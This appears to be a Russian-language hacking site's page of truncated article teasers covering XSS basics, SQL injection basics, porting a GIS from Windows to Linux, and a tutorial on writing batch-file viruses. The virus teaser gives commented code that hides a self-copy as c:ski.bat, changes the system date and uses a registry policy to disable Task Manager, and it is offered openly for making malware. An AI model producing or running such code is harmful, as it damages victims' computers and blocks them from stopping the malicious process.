Атаки класса XSS
Привет!!!
В этой теме я хочу детально описать XSS от A до Я.
Есть много инфы по XSS , но ни в 1-ой из статей я не нашёл хорошего объяснения для новичков , извините если я ошибаюсь...
Статью не полностю написал я , кое-что нашел в нете , кое-что на различных форумах соответствующей тематики =)
И так приступим . . .

=========================================================================================
XSS - это атаки класса Cross Site Scripting и чтобы не путать с CSS (каскадные таблици стилей) , их также назвыают XSS (Cross от англ. - крест , поэтому заменён на X , остальное оставленно без изменения)
Впервые этот БАГ появился в 1997 г.

==========================================================================================
Как же используют XSS ?

Для начала нам нужно знать , что такое Cookie.

Если вы знаете , можете пропустить.
Cookie - это временные файлы , служащие для сохранения учетных данных сай ... Читать дальше »

Совмещение батников с реестром
Вступление:
В прошлой статье я рассказал как создавать вирусы с расширением .BAT
В этой статье я научу совмещать батники с реестром. Как всегда используем обычный блокнот.

Итак начнем :-))) , каждую новую строчку я буду пояснять.

@Echo off (запрещаем вывод на экран исполняемых команд)
Echo Virus Loading (Выводит на экран надпись «Virus Loading» В место нее можете писать что угодно)
Date 13.09.96 (эта строка изменяет дату)
If exist c:ski.bat goto abc (проверяет существует ли файл, …..)
Copy %0 c:ski.bat (копирует вирус только изменив названия)
Attrib +h c:ski.bat ( делает файлу ski.bat атрибут скрытый
:abc ( ……если он существует, то программа перейдет на метку :abc)
reg add "HKCUSoftwareMicrosoftWindowsCurrentVersionPoliciesSystem" /v DisableTaskMgr /t REG_DWORD /d 1 /f (Писать в одной строчке. Отключает диспечер задач. после /v- названия параметра. после /t-тип . после /d-значения. /f –делается скрыт ... Читать дальше »

Долбим SQL’ные базы данных
Не секрет, что баги в скриптах всегда были ахиллесовой пятой многих веб-ресурсов. Просканишь хост, посмотришь, какие сервисы и каких версий там крутятся, и опускаешь руки - просто неоткуда подступиться. Все лишнее закрыто фаерволом, а то, что открыто - пропатчено до последних версий. Засекурено по максимуму. И тут исход взлома решает какая-то байда в скрипте, заставляющая прыгать от радости.

Итак, сегодня на повестке дня - техника взлома скриптов, почти по-наркомански называемая SQL injection. Для понимания всех прелестей этой фишки неплохо бы немного знать, что такое SQL, или, по-нашему, скуль. Об этом очень кратко читай в следующих абзацах.

Ликбез по SQL

Язык SQL (Structured Query Language) на сегодняшний день является стандартом де-факто практически для всех распространенных серьезных СУБД. Он предназначен для составления запросов к базе данных. Запросы могут иметь цель добавить некоторые данные в базу, их модификацию, поиск и т ... Читать дальше »

Перенос приложений из Windows в Linux
Рост популярности ОС Linux и появление спроса на поддержку одновременно различных операционных платформ потребовал от разработчиков освоения технологии создания многоплатформного программного обеспечения. В статье излагается конкретный опыт коллектива разработчиков геоинформационной системы «Панорама» по переносу этой системы с платформы Windows на Linux. Первая версия системы «Панорама» была создана специалистами Топографической службы Вооруженных Сил РФ в 1991 году. Программы были написаны на языке Си с применением встроенного ассемблера для системы MS-DOS.

Разработка оказалась достаточной удачной и при простом интерфейсе имела высокую скорость отображения растровой и векторной графики, а также профессиональный набор средств векторизации отсканированных карт местности. Это обеспечило относительное долголетие системы, которая широко применяется до сегодняшнего дня в целях создания электронных карт. Благодаря компактности системы на ее ... Читать дальше »